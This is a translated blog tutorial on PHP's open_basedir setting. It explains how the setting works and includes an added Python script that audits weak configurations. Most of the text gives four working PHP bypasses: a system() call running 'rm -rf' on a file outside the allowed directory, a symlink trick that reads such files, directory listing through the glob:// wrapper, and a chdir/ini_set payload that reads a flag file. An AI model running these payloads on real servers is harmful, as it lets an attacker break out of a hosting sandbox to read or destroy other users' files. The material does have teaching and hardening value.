php open_basedir bypass settings

Principle
About open_basedir
    open_basedir is a configuration option in php.ini.
    It limits the files an active user (script) may access to the specified area.
    For example, with open_basedir set to /home/wwwroot/home/web1 and /tmp/, a user reaching the server through web1 cannot obtain any file on the server outside those two directories, /home/wwwroot/home/web1 and /tmp/.
    Note that the limit specified with open_basedir is actually a prefix, not a directory name.
    For example, if open_basedir = /dir/user, then both the directory /dir/user and the directory /dir/user1 are accessible. So if you want to restrict access to the specified directory only, end the path name with a slash.
Supplementary notes:
    ① If a php.ini configuration item has a semicolon in front of it, it is commented out and php.ini does not set it. The setting is then most likely made in php-fpm's fastcgi.conf; the php-fpm configuration overrides the php.ini configuration.
    ② Settings made in php.ini or fastcgi.conf apply to all projects. To configure a single project separately, place a .user.ini in that project's root directory.
    .user.ini configuration
    First, make .user.ini take effect by setting the following in php.ini:
        user_ini.filename = ".user.ini"
        user_ini.cache_ttl = 300
    Comment out the open_basedir configuration in fastcgi.conf.
    Create a .user.ini file in the root directory of the project and write the following into it:
         open_basedir = /tmp/:/proc/:/you_web_path
    Restart the php-fpm service.
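The following is an added example, not code from the original post: a small audit script that reads open_basedir and disable_functions values in the php.ini / .user.ini format described above, models the documented prefix rule (an entry without a trailing slash also admits sibling names that start with it), and reports which of the functions the later sections use to step outside the restriction (system() and the other command functions in 0x01, symlink() in 0x02) are not yet in disable_functions. The parser and the prefix model are simplified assumptions for illustration, not PHP's own code, and the two ini texts are constructed samples.

```python
# Added example (not from the original post): audit open_basedir and
# disable_functions values as they appear in php.ini or a .user.ini.
# The parser and the prefix model below are simplified assumptions, not PHP's code.
import posixpath

# Functions used in the post's bypasses: shell execution (0x01) and symlink (0x02).
# Which ones to disable is a policy choice for the deployment.
RISKY_FUNCTIONS = {"system", "exec", "shell_exec", "passthru",
                   "proc_open", "popen", "symlink"}


def parse_ini(text):
    """Minimal php.ini-style parser: ignores ';' comments, blank lines and
    [section] headers; returns {key: value} with surrounding quotes stripped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";[" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip().strip('"')
    return settings


def prefix_allows(entry, path):
    """Model of the documented open_basedir rule for one entry.
    `path` is assumed to be canonical already (absolute, no '..', no symlinks);
    resolving symlinks is exactly what the 0x02 trick plays with, so it is out
    of scope for this model."""
    path = posixpath.normpath(path)
    if entry.endswith("/"):
        # Trailing slash: only the directory itself and what lies below it.
        base = posixpath.normpath(entry)
        if base == "/":
            return True
        return path == base or path.startswith(base + "/")
    # No trailing slash: plain string prefix, so /dir/user also admits /dir/user1.
    return path.startswith(posixpath.normpath(entry))


def path_allowed(open_basedir, path):
    """True when any ':'-separated open_basedir entry admits the path."""
    return any(prefix_allows(e, path) for e in open_basedir.split(":") if e)


def audit(ini_text):
    """Return a list of human-readable findings for the given ini text."""
    findings = []
    settings = parse_ini(ini_text)
    open_basedir = settings.get("open_basedir")
    if not open_basedir:
        findings.append("open_basedir is not set (a ';' in front of it means it is commented out)")
    else:
        for entry in open_basedir.split(":"):
            if entry and not entry.endswith("/"):
                findings.append(
                    f"open_basedir entry {entry!r} has no trailing slash: "
                    f"it also admits sibling names such as {entry}1")
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    for name in sorted(RISKY_FUNCTIONS - disabled):
        findings.append(f"{name}() is not listed in disable_functions")
    return findings


# Constructed sample inputs (not taken from any real server).
WEAK_INI = """\
; open_basedir = /home/wwwroot/home/   <- commented out, so this line does nothing
open_basedir = /tmp/:/proc/:/home/wwwroot/home/web1
disable_functions = system,exec,shell_exec,passthru
"""

HARDENED_INI = """\
open_basedir = /tmp/:/home/wwwroot/home/web1/
disable_functions = system,exec,shell_exec,passthru,proc_open,popen,symlink
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"[{label}]")
        for finding in audit(text) or ["no findings"]:
            print("  -", finding)
    # The prefix rule in action: /dir/user admits /dir/user1, /dir/user/ does not.
    print(prefix_allows("/dir/user", "/dir/user1/secret"),
          prefix_allows("/dir/user/", "/dir/user1/secret"))
```

Running the script prints four findings for the weak sample (the web1 entry without a trailing slash, plus three functions missing from disable_functions) and none for the hardened one; the final line prints True False, which is the trailing-slash point made above in code.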
About symbolic links
    A symbolic link, also called a soft link, is a special kind of file that contains the path name (absolute or relative) of another file.
    That path can point to any file or directory, and it can link files across different file systems. When the link file is read or written, the system automatically redirects the operation to the source file; when the link file is deleted, the system simply deletes the link file itself and does not delete the source file.

0x01 Bypass method 1: system command functions
Since open_basedir does not apply to commands run through the command execution functions, we can use those functions to reach directories outside the restriction.
We first create a directory
    /home/puret/test/
and in this directory create a new 1.txt whose content is abc
    nano 1.txt
then create a directory named b inside it
    mkdir b
and in that directory create a 1.php whose content is
    <?php
      echo file_get_contents("../1.txt");
    ?>
and set our open_basedir in php.ini
    open_basedir = /home/puret/test/b/
We run 1.php to see whether open_basedir limits our access.
The result (shown in a screenshot in the original post) is that
we obviously cannot directly read a file outside the directory specified by open_basedir.
Next we try to use the system function to get around the open_basedir restriction and delete 1.txt.
Edit 1.php to
    <?php
      system("rm -rf ../1.txt");
    ?>
Let's look at the files before executing 1.php (screenshot in the original post),
and after executing 1.php (screenshot in the original post).
The command execution function successfully bypassed open_basedir and deleted the file.
Since the command execution functions are generally disabled through disable_functions, we need to find other ways to get around the restriction.

0x02 Bypass method 2: the symlink() function
Let's take a look at the symlink function
    bool symlink(string $target, string $link)
The symlink function creates a symbolic link named link that points to target; of course, under normal circumstances this target is restricted by open_basedir.
Since early versions of symlink did not support Windows, my test environment is Linux.
The PHP version tested is 5.3.0; test other versions yourself.
Under Linux, certain cross-directory operations through symlink can lead to a logic flaw in the file check that bypasses open_basedir.
We begin by editing /var/www/html/1.php so that its content is
    <?php
      mkdir("c");      // create a directory
      chdir("c");      // change into it
      mkdir("d");
      chdir("d");
      chdir("..");
      chdir("..");
      symlink("c/d", "tmplink");
      symlink("tmplink/../../1.txt", "exploit");
      unlink("tmplink");
      mkdir("tmplink");
      echo file_get_contents("http://127.0.0.1/exploit");
    ?>
Then create a new file 1.txt under /var/www/ with content
    "abc"
Set our open_basedir again
    open_basedir = /var/www/html/
and in the html directory write a php script to test open_basedir
    <?php
       file_get_contents("../1.txt");
    ?>
Execute it and look.
As expected, the file cannot be accessed.
Now execute the 1.php we just wrote.
It successfully reads the contents of 1.txt, escaping the open_basedir restriction.
The key issue is
    symlink("tmplink/../../1.txt", "exploit");
At this point tmplink is a symbolic link pointing to the path c/d, so the path that exploit points to becomes
    c/d/../../1.txt
Since this path lies within the scope of open_basedir, exploit is created successfully.
After we delete the tmplink symbolic link and then create a folder with the same name tmplink, the path exploit points to is still
    tmplink/../../1.txt
Since tmplink is now a real folder, tmplink/../../ resolves to the directory where 1.txt is located, that is /var/www/,
and so the contents of 1.txt can be read by accessing the exploit symbolic link directly.
Of course, for symlink() it is enough to put it in disable_functions to solve the problem, so we need to find more methods.

0x03 Bypass method 3: the glob pseudo-protocol
glob is a pseudo-protocol (stream wrapper) available since PHP 5.3.0 that takes effect when filtering directories; since its directory filtering is not checked against open_basedir, we can use it to get around the restriction. We create a new directory named test under /var/www/
and create t.php under /var/www/html/ with the content
    <?php
      $a = "glob:///var/www/test/*.txt";
      if ($b = opendir($a)) {
        while (($file = readdir($b)) !== false) {
          echo "filename:" . $file . "\n";
        }
        closedir($b);
      }
    ?>
The result is shown in a screenshot in the original post:
it successfully escapes the open_basedir restriction and reads the file names.

0x04 Bypass method 4: source-code logic
Blog: https://xz.aliyun.com/t/4720
Payload:
    chdir('img');
    ini_set('open_basedir', '..');
    chdir('..'); chdir('..'); chdir('..'); chdir('..');
    ini_set('open_basedir', '/');
    echo file_get_contents('flag');

Origin www.cnblogs.com/cimuhuashuimu/p/11544487.html